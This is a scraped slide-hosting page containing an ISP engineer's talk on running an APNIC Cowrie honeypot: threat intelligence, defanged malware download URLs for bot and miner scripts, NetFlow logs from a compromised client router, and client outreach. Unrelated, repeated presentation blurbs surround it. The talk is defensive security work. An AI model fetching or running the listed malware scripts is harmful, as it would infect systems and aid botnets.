The document discusses using honeypots for network security analysis. It begins with background on honeypots, explaining that they are decoy systems meant to attract cyber attacks. The document then discusses threat intelligence gathered from a honeypot including unique source IPs, attacked ports, downloaded scripts and their origins, and affected internal IPs. It notes the top devices targeted were outdated routers and IP cameras. The document concludes with discussing internal analysis and challenges convincing a client they have an issue after honeypot alerts.
Over 91% percent malware uses DNS(As Cisco 2016 Annual Cyber security report).Nearly all the cryptominer stuffs uses DNS based C&C(As Cisco 2016 Annual Cyber security report)
RPZ allows a recursive server to control the behavior of responses to queries.Administrator to overlay custom information on
top of the global DNS to provide alternate responses to queries.
RPZ data is supplied as a DNS zone, and can be
loaded from a file or retrieved over the network by AXFR/IXFR.It works like firewall on cloud.DNS RPZ will block DNS resolution, machines connecting to the C&C via IP add
This presentation covers routing security at the Internet Scale in detail with a focus on IRR. It talks about how IRRs work, the challenges in IRR based filtering as well as some of the tools which can be used. It also touches RPKI as well as developments IRR-RPKI integration in the next version of IRR daemon.
Over 91% percent malware uses DNS(As Cisco 2016 Annual Cyber security report).Nearly all the cryptominer stuffs uses DNS based C&C(As Cisco 2016 Annual Cyber security report)
RPZ allows a recursive server to control the behavior of responses to queries.Administrator to overlay custom information on
top of the global DNS to provide alternate responses to queries.
RPZ data is supplied as a DNS zone, and can be
loaded from a file or retrieved over the network by AXFR/IXFR.It works like firewall on cloud.DNS RPZ will block DNS resolution, machines connecting to the C&C via IP add
This presentation covers routing security at the Internet Scale in detail with a focus on IRR. It talks about how IRRs work, the challenges in IRR based filtering as well as some of the tools which can be used. It also touches RPKI as well as developments IRR-RPKI integration in the next version of IRR daemon.
Actual Condition Survey of Malware Download Sites for A Long PeriodAPNIC
Actual Condition Survey of Malware Download Sites for A Long Period, by Yasuyuki Tanaka.
A presentation given at APRICOT 2016’s Network Security session on 24 February 2016.
BSides: BGP Hijacking and Secure Internet RoutingAPNIC
APNIC Senior Network Analyst/Technical Trainer Warren Finch and APNIC Training Delivery Manager Tashi Phuntsho present on current tool and techniques, how Resource Public Key Infrastructure (RPKI) is just a piece in the puzzle, and what we should all do to secure Internet routing at BSides in Brisbane, Australia on 12 December 2020.
PacNOG 29: Routing security is more than RPKIAPNIC
APNIC Chief Scientist presented on how much more there is to routing security than just RPKI at PacNOG 29, held online from 29 November to 9 December 2021.
Mr. Donald Rumsfeld, former Defence Secretary of USA, stated in his book "Known and Unknown: A Memoir" that "There are known knowns, things we know that we know; and there are known unknowns, things that we know we don't know. But there are also unknown unknowns, things we do not know we don't know." And to know that unknowns of the unknown, my journey with the APNIC honeynet project started and I am going to share my experiences here in this talk.
Actual Condition Survey of Malware Download Sites for A Long PeriodAPNIC
Actual Condition Survey of Malware Download Sites for A Long Period, by Yasuyuki Tanaka.
A presentation given at APRICOT 2016’s Network Security session on 24 February 2016.
BSides: BGP Hijacking and Secure Internet RoutingAPNIC
APNIC Senior Network Analyst/Technical Trainer Warren Finch and APNIC Training Delivery Manager Tashi Phuntsho present on current tool and techniques, how Resource Public Key Infrastructure (RPKI) is just a piece in the puzzle, and what we should all do to secure Internet routing at BSides in Brisbane, Australia on 12 December 2020.
PacNOG 29: Routing security is more than RPKIAPNIC
APNIC Chief Scientist presented on how much more there is to routing security than just RPKI at PacNOG 29, held online from 29 November to 9 December 2021.
Mr. Donald Rumsfeld, former Defence Secretary of USA, stated in his book "Known and Unknown: A Memoir" that "There are known knowns, things we know that we know; and there are known unknowns, things that we know we don't know. But there are also unknown unknowns, things we do not know we don't know." And to know that unknowns of the unknown, my journey with the APNIC honeynet project started and I am going to share my experiences here in this talk.
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the the big boys. This presentation covers several analysis environment options and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja (;)) in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in IUT CTF G3t R00t
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the the big boys. This presentation covers several analysis environment options and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja (;)) in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.
A Botnet Detecting Infrastructure Using a Beneficial BotnetTakashi Yamanoue
A beneficial botnet, which tries to cope with technology of malicious botnets such as peer to peer (P2P) networking and Domain Generation Algorithm (DGA), is discussed. In order to cope with such botnets’ technology, we are developing a beneficial botnet as an anti-bot measure, using our previous beneficial bot. The beneficial botnet is a group of beneficial bots. The P2P communication of malicious botnet is hard to detect by a single Intrusion Detection System (IDS). Our beneficial botnet has the ability to detect P2P communication, using collaboration of our beneficial bots. The beneficial bot could detect communication of the pseudo botnet which mimics malicious botnet communication. Our beneficial botnet may also detect communication using DGA. Furthermore, our beneficial botnet has ability to cope with new technology of new botnets, because our beneficial botnet has the ability to evolve, as same as malicious botnets.
Wireless Pentesting: It's more than cracking WEPJoe McCray
This presentation walks you through the fundamentals of attacking and defending wireless networks.
Attacking WEP, WPA, WPA2, WPA Enterprise and captive portals is covered, and this presentation will be updated periodically. So keep checking back for updates.
How Cyberflow Analytics have used KeyLines’ network visualization functionality to develop the next generation of cyber security analytics platform – built for the scope and scale of the Internet of Things.
Similar to Having Honeypot for Better Network Security Analysis (20)
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
Gen Z and the marketplaces - let's translate their needsLaura Szabó
The product workshop focused on exploring the requirements of Generation Z in relation to marketplace dynamics. We delved into their specific needs, examined the specifics in their shopping preferences, and analyzed their preferred methods for accessing information and making purchases within a marketplace. Through the study of real-life cases , we tried to gain valuable insights into enhancing the marketplace experience for Generation Z.
The workshop was held on the DMA Conference in Vienna June 2024.
Italy Agriculture Equipment Market Outlook to 2027harveenkaur52
Agriculture and Animal Care
Ken Research has an expertise in Agriculture and Animal Care sector and offer vast collection of information related to all major aspects such as Agriculture equipment, Crop Protection, Seed, Agriculture Chemical, Fertilizers, Protected Cultivators, Palm Oil, Hybrid Seed, Animal Feed additives and many more.
Our continuous study and findings in agriculture sector provide better insights to companies dealing with related product and services, government and agriculture associations, researchers and students to well understand the present and expected scenario.
Our Animal care category provides solutions on Animal Healthcare and related products and services, including, animal feed additives, vaccination
Having Honeypot for Better Network Security Analysis
1. Having Honeypot for Better Network Security Analysis
A journey with APNIC honeypot
A. S. M. Shamim Reza
Link3 Technologies Limited
shamimreza@link3.net
3. Honeypot – what is it?
“a honeypot It's a sacrificial computer system that's intended to attract cyber-
attack, like a decoy. It mimics a target for hackers, and uses their intrusion
attempts to gain information about cyber-criminals and the way they are
operating or to distract them from other targets. “
– Kaspersky LAB
4. Honeypot – what is it?
“a honeypot It's a sacrificial computer system that's intended to attract cyber-
attack, like a decoy. It mimics a target for hackers, and uses their intrusion
attempts to gain information about cyber-criminals and the way they are
operating or to distract them from other targets. “
– Kaspersky LAB
Honeypots are classified as:
– Low level interaction
– Mid interaction honeypot
– High interaction honeypot
“Cowrie is a medium to high interaction SSH and Telnet honeypot designed to
log brute force attacks and the shell interaction performed by the
attacker.”
– Michel Oosterhof.
5. Background history
– The idea of honeypots began in 1989 with a
Publication “The Cuckoo’s Egg” by Clifford Stoll.
– First ever Honeypot was released in 1997, called
the Deceptive Toolkit.
– In 1998 the first commercial honeypot came out,
called Cybercop Sting.
6. Background history
– The idea of honeypots began in 1989 with a Publication “The Cuckoo’s Egg”
by Clifford Stoll.
– First ever Honeypot was released in 1997, called the Deceptive Toolkit.
– In 1998 the first commercial honeypot came out, called Cybercop Sting.
– For me it started, interest, at bdNOG1, 2014
– Planned to host it at Link3 in APRICOT 25, 2020.
– Influenced by Adli Wahid, Senior Internet Security Specialist, APNIC
Link3 has hosted APNIC Honeypot, as a part of on going project “SOC”.
7. Honeypot – Question to ASK !!!
Motivations
• What is the primary purpose of the honeypot?
• What are you trying to protect?
• Are you interested in any attacks, or just ones that could be successful?
• Are you interested in learning how the hacker or malware was initially successful?
• Are you interested in identifying the hacker or origination point of the malware?
• Are you interested in what the hacker or malware did (or wanted to do) after the initial exploit
gained entrance to the honeypot?
• Are you interested in what tools, techniques, or tactics were used?
Based on this brainstorming, you can decide which sort of honeypot you are gonna work with.
*** Honeypot Data Analysis. In: Honeypots for Windows. - Roger A. Grimes
8. Honeypot – how is it being useful
By Analyzing the traffic towards the Honeypot will help to get
– where the cyber-criminals are coming from
– the level of threat
– what are the methods they are using
– what data or applications they are interested in
– how well your security measures are working to stop cyber-attack
Who Host Honeypot ?
– large organization
– Security researcher
11. Threat Intel ?
Those URLs ?? hxxp://1.2.3.4/bot.x86_64
– Reported as C2C server.
– Since June 2020
12. Threat Intel ?
Those URLs ?? hxxp://1.2.3.4/bot.x86_64
– I need to know the detail of these files, so I have taken it to hybrid analysis.
And The Kaspersky LAB says - “Usually malware of this family is used to perform DDoS attacks.”
13. Threat Intel ?
Those URLs ??
hxxp://2.3.4.5/div
Hxxp://2.3.4.5/miner.sh
These TWO script was downloaded by an outsider IP – 213.202.233.171
Open Ports – 22 80 443
14. Threat Intel ?
Those URLs ??
hxxp://2.3.4.5/div
Hxxp://2.3.4.5/miner.sh
These TWO script was downloaded by an outsider IP – 213.202.233.171
First Report – 18 August 2020
Last report – 25 August 2020
– Mostly Scan for SSH port
– patterns show they are looking for Honeypots.
15. Threat Intel ?
Those URLs ??
hxxp://2.3.4.5/div
Hxxp://2.3.4.5/miner.sh
These TWO script was downloaded by an outsider IP – 213.202.233.171
18. Threat Intel ?
Those URLs ??
hxxp://2.3.4.5/div
Hxxp://2.3.4.5/miner.sh
This IP from USA serves the scripts,
and the script download another 10 scripts
from Canada.
19. Threat Intel ?
Few things to remember while
working with Honeypot or similar.
1. All those script check was performed
in a strict LAB environment.
2. NMAP scan and web-URL check
was followed the same procedure (as 1).
3. If you do not take proper precautions,
things might get worse and make you the
victim accidentally
20. What about the internals !!!
What I do, when I got any notifications at slack
– Run nmap scan to get the port/service info of the device, associated with the IP.
– Search for the DNS query history for the respective IPs.
– Search for the type of the client in to our Client-Database.
– Tricky part is to convince the client, so that I can get NetFlow or Packet-Capture accordingly.
– Analyze the data, and try to find out the story behind it.
– Recommend some best practices to the respective clients accordingly.
21. What about the internals !!!
What I do, when I got any notifications at slack
– Run nmap scan to get the port/service info of the device, associated with the IP.
– Search for the DNS query history for the respective IPs.
– Search for the type of the client in to our Client-Database.
– Tricky part is to convince the client, so that I can get NetFlow or Packet-Capture accordingly.
– Analyze the data, and try to find out the story behind it.
– Recommend some best practices to the respective clients accordingly.
Devices that are related to those 57 IPs
So let us watch a story on the next few slides
Device Name Version %
Mikrotik Router < 6.46.6 92%
Zyxel Router Backdated firmware 2.1%
DVR System Backdated firmware 4.2%
Netgear Router Backdated firmware 1.78%
22. What about the internals !!! one CCIE got it covered?
– Slack gives me an alert, and I let my CS team knew to work on that particular client.
– 2 days later I got alert for the same IP, me again knock my CS team to work on it.
– 1 day later, I got the alert again; and then I asked our CS team whether they have worked on it or not ?
– they replied, on second day client IT concern replied
23. What about the internals !!! one CCIE got it covered?
– Slack gives me an alert, and I let my CS team knew to work on that particular client.
– 2 days later I got alert for the same IP, me again knock my CS team to work on it.
– 1 day later, I got the alert again; and then I asked our CS team whether they have worked on it or not ?
– they replied, on second day client IT concern replied “i am a CCIE, I know what is happening
in my network, you guys dont have to bother me again & again”
So the challenge begins for me → → →
[192.168.0.133 ← Faked the User’s IP for demonstration purpose]
24. What about the internals !!! what I was doing ?
So before going to him.
– Run nmap scan, and got this info →→→→→→→→
25. What about the internals !!! what I was doing ?
So before going to him.
– Run nmap scan, and got this info →→→→→→→→
– At the same time, I have set a logic at
my NetFlow server to give me associated info.
Date first seen Duration Proto Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes pps bps Bpp Flows
2020-07-01 00:05:04.760 3.168 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 413 615089 130 1.6 M 1489 1
2020-07-01 00:05:05.754 1.504 TCP 192.168.0.133:80 -> 185.220.103.9:60310 ...AP..F 0 83 122394 55 651031 1474 1
2020-07-01 00:05:05.775 2.784 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 62 88548 22 254448 1428 1
2020-07-01 00:05:05.766 3.200 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...A.... 0 205 307500 64 768750 1500 1
2020-07-01 00:05:05.759 0.000 GRE 192.168.0.133:0 -> 103.92.153.42:0 ........ 0 1 28 0 0 28 1
2020-07-01 00:05:05.764 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 25 33531 9 99794 1341 1
2020-07-01 00:05:07.757 2.656 TCP 192.168.0.133:80 -> 185.220.103.9:35334 ...AP... 0 145 212395 54 639743 1464 1
2020-07-01 00:05:07.757 3.008 TCP 192.168.0.133:80 -> 185.220.103.9:60268 ...AP... 0 271 403745 90 1.1 M 1489 1
2020-07-01 00:05:08.764 2.592 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 98 142399 37 439503 1453 1
2020-07-01 00:05:08.775 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 37 52879 13 157377 1429 1
2020-07-01 00:05:08.762 2.080 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...AP..F 0 174 258552 83 994430 1485 1
2020-07-01 00:05:09.778 3.104 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 213 317835 68 819162 1492 1s
26. What about the internals !!! what I was doing ?
So before going to him.
– Run nmap scan, and got this info →→→→→→→→
– At the same time, I have set a logic at
my NetFlow server to give me associated info.
Date first seen Duration Proto Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes pps bps Bpp Flows
2020-07-01 00:05:04.760 3.168 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 413 615089 130 1.6 M 1489 1
2020-07-01 00:05:05.754 1.504 TCP 192.168.0.133:80 -> 185.220.103.9:60310 ...AP..F 0 83 122394 55 651031 1474 1
2020-07-01 00:05:05.775 2.784 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 62 88548 22 254448 1428 1
2020-07-01 00:05:05.766 3.200 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...A.... 0 205 307500 64 768750 1500 1
2020-07-01 00:05:05.759 0.000 GRE 192.168.0.133:0 -> 103.92.153.42:0 ........ 0 1 28 0 0 28 1
2020-07-01 00:05:05.764 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 25 33531 9 99794 1341 1
2020-07-01 00:05:07.757 2.656 TCP 192.168.0.133:80 -> 185.220.103.9:35334 ...AP... 0 145 212395 54 639743 1464 1
2020-07-01 00:05:07.757 3.008 TCP 192.168.0.133:80 -> 185.220.103.9:60268 ...AP... 0 271 403745 90 1.1 M 1489 1
2020-07-01 00:05:08.764 2.592 TCP 192.168.0.133:80 -> 185.220.103.9:60264 ...AP... 0 98 142399 37 439503 1453 1
2020-07-01 00:05:08.775 2.688 TCP 192.168.0.133:80 -> 185.220.103.9:60312 ...AP... 0 37 52879 13 157377 1429 1
2020-07-01 00:05:08.762 2.080 TCP 192.168.0.133:80 -> 185.220.103.9:60266 ...AP..F 0 174 258552 83 994430 1485 1
2020-07-01 00:05:09.778 3.104 TCP 192.168.0.133:80 -> 185.220.103.9:59778 ...AP... 0 213 317835 68 819162 1492 1s
Noticed
something
27. What about the internals !!! what I was doing ?
– Searched the IP at AbuseDB and Other Places.
– and the reputation was not good; actually it was
worse
28. What about the internals !!! what I was doing ?
So I have got what I need, to talk to him.
– the conversation was like … …. …
… … … … … … …
… .. .. .. .. .. .. ..
– I finally managed to convince him that, he is not responsible for
anything, rather there is something bad is happening and I am here
to help only.
– but I didnt get any Netflow or Packet-Capture data from him. SO
me only have options to monitor the activities of that IP.
29. What about the internals !!! what I was doing ?
So I have got what I need, to talk to him.
– the conversation was like … …. …
… … … … … … …
… .. .. .. .. .. .. ..
– I finally managed to convince him that, he is not responsible for
anything, rather there is something bad is happening and I am here
to help only.
– but I didnt get any Netflow or Packet-Capture data from him. SO
me only have options to monitor the activities of that IP.
Update: since September 2020 I dont get any hit from that IP.
30. SO the benefits of having APNIC Honeypot in place
– Before having APNIC honepot in place, we didn't have any direct info of which IP or its
internal LAN is compromised.
– Though Cowrie is for only ssh & telnet service, but still the logs gives some meaning full
info to study on. And we are planning to host some other honeypot aswell.
– Since 2013/2014 we have been maintaining security policy strictly, which are fine tuned on a
regular basis.
– Hosting APNIC honeypot is a low cost solution.
– Info-graphic dashboard gives a greater view, like - which region is performing most of the
attack.
31. “There are known knowns, things we know that we know;
and there are known unknowns, things that we know we
don't know. But there are also unknown unknowns, things
we do not know we don't know.”
Donald Rumsfeld, Known and Unknown: A Memoir
‘‘
‘‘
32. Thank You
for your attention
shamimrezasohag
Contact with Me | asmshamimreza
sohag.shamim